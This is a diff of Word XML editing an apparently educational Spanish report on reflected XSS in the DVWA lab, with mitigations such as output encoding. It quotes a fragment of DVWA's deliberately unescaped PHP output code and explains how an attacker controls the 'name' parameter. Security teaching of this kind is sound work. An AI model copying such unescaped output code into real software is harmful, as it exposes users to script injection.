-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:textOutline w14:w="0" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
-            <w14:noFill/>
-            <w14:prstDash w14:val="solid"/>
-            <w14:round/>
-          </w14:textOutline>
-          <w14:props3d w14:extrusionH="57150" w14:contourW="0" w14:prstMaterial="softEdge">
-            <w14:bevelT w14:w="25400" w14:h="38100" w14:prst="circle"/>
-          </w14:props3d>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 'name' ] . '&lt;/pre&gt;'; </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2156,6 +2133,19 @@
         </w:rPr>
         <w:t>Reflected</w:t>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> de la maquina DVWA</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2180,40 +2170,7 @@
           <w:lang w:eastAsia="es-ES"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>E</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>s</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>te código</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> tiene una vulnerabilidad de seguridad grave</w:t>
+        <w:t>Este código tiene una vulnerabilidad de seguridad grave</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2248,7 +2205,95 @@
           <w:lang w:eastAsia="es-ES"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>“</w:t>
+        <w:t>“name</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">”, al concatenar </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>la entrada del usuario en la salida</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> del código, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>sin ningún tipo de validación o escape</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>, permitiendo que u</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>n atacante p</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ueda </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">proporcionar un valor de </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2261,158 +2306,7 @@
           <w:lang w:eastAsia="es-ES"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>name</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">”, al concatenar </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>la entrada del usuario en la salida</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> del código, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>sin</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> ningún tipo de validación o escape</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>, permitiendo que u</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>n atacante p</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ueda </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">proporcionar un valor de </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:i/>
-          <w:iCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>“</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:i/>
-          <w:iCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>name</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:i/>
-          <w:iCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>”</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:i/>
-          <w:iCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">“name” </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2582,6 +2476,7 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:noProof/>
           <w:kern w:val="0"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
@@ -2666,6 +2561,7 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:noProof/>
           <w:kern w:val="0"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
@@ -2746,7 +2642,6 @@
         </w:rPr>
         <w:t>“No permitir</w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
@@ -2769,9 +2664,8 @@
           <w:lang w:eastAsia="es-ES"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t xml:space="preserve">  .</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>.</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2789,6 +2683,7 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:noProof/>
           <w:kern w:val="0"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
@@ -3180,6 +3075,7 @@
           <w:numId w:val="38"/>
         </w:numPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
           <w:kern w:val="0"/>
@@ -3209,6 +3105,7 @@
           <w:numId w:val="39"/>
         </w:numPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
           <w:kern w:val="0"/>
@@ -3239,6 +3136,17 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
         <w:t>as</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>, especialmente el navegador.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3249,6 +3157,7 @@
           <w:numId w:val="39"/>
         </w:numPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
           <w:kern w:val="0"/>
@@ -3301,6 +3210,7 @@
           <w:numId w:val="39"/>
         </w:numPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
           <w:kern w:val="0"/>
@@ -3330,49 +3240,26 @@
           <w:numId w:val="38"/>
         </w:numPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Host </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>side</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>:</w:t>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Host side:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3380,39 +3267,369 @@
         <w:pStyle w:val="Prrafodelista"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="41"/>
+          <w:numId w:val="39"/>
         </w:numPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Iljf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Codificar los datos de requerimientos HTTP</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> HTML</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> en </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>los</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> campos de salida </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>del usuario</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (Output Encoding)</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="HTMLconformatoprevio"/>
+        <w:pStyle w:val="Prrafodelista"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="38"/>
+          <w:numId w:val="39"/>
         </w:numPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Utilizar frameworks</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Refdenotaalpie"/>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:footnoteReference w:id="4"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> con buena reputación en seguridad que incluyan los ataques XSS</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, que </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>automáticamente codifi</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>quen</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> el contenido </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">web </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">para </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">prevenir </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ataques </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>XSS</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
